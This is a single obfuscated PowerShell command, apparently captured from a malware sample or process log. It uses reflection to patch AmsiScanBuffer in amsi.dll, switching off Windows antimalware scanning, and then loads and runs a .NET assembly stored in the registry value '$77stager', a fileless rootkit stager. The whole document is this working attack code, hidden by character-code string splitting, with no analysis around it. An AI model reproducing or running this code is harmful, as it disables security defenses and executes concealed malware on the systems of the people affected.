"powershell.EXE" "function Local:dCjhIoQYBjiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZQXsVjQHdPnjlc,[Parameter(Position=1)][Type]$yfivpvzBcG)$AHxRwqDDbpd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+'e'+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+'a'+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'An'+[Char](115)+''+'i'+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$AHxRwqDDbpd.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZQXsVjQHdPnjlc).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'an'+'a'+'g'+[Char](101)+''+'d'+'');$AHxRwqDDbpd.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+'Si'+[Char](103)+','+[Char](78)+'ew'+'S'+'l'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$yfivpvzBcG,$ZQXsVjQHdPnjlc).SetImplementationFlags('Ru'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+'g'+''+'e'+''+'d'+'');Write-Output $AHxRwqDDbpd.CreateType();}$pwzRTGYmhKhHu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+'p'+''+[Char](119)+''+[Char](122)+''+'R'+''+'T'+''+'G'+'Y'+[Char](109)+''+'h'+''+[Char](75)+''+'h'+''+[Char](72)+''+[Char](117)+'');$gfcFFFaXLOWeJS=$pwzRTGYmhKhHu.GetMethod('g'+[Char](102)+''+[Char](99)+''+[Char](70)+''+[Char](70)+''+'F'+''+[Char](97)+'X'+'L'+'OW'+'e'+''+[Char](74)+''+[Char](83)+'',[Reflection.BindingFlags]'P'+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+'St'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XZQueZadtqtqPgxQUTV=dCjhIoQYBjiP @([String])([IntPtr]);$BLkloCSFEzRwzpZFNksRLX=dCjhIoQYBjiP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xgvDsCsKOkJ=$pwzRTGYmhKhHu.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+''+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$YHdCyWBQkreJws=$gfcFFFaXLOWeJS.Invoke($Null,@([Object]$xgvDsCsKOkJ,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+'L'+''+'i'+''+'b'+''+'r'+'a'+[Char](114)+'y'+'A'+'')));$RwTzhbSJngbuYUJEU=$gfcFFFaXLOWeJS.Invoke($Null,@([Object]$xgvDsCsKOkJ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+'c'+''+'t'+'')));$AaxIyeA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YHdCyWBQkreJws,$XZQueZadtqtqPgxQUTV).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+'d'+''+'l'+''+[Char](108)+'');$hLztiFsNuTobkgSep=$gfcFFFaXLOWeJS.Invoke($Null,@([Object]$AaxIyeA,[Object](''+'A'+''+[Char](109)+'siS'+[Char](99)+'a'+'n'+'B'+'u'+''+'f'+'f'+'e'+''+[Char](114)+'')));$BMMlkWWzPj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RwTzhbSJngbuYUJEU,$BLkloCSFEzRwzpZFNksRLX).Invoke($hLztiFsNuTobkgSep,[uint32]8,4,[ref]$BMMlkWWzPj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$hLztiFsNuTobkgSep,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RwTzhbSJngbuYUJEU,$BLkloCSFEzRwzpZFNksRLX).Invoke($hLztiFsNuTobkgSep,[uint32]8,0x20,[ref]$BMMlkWWzPj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)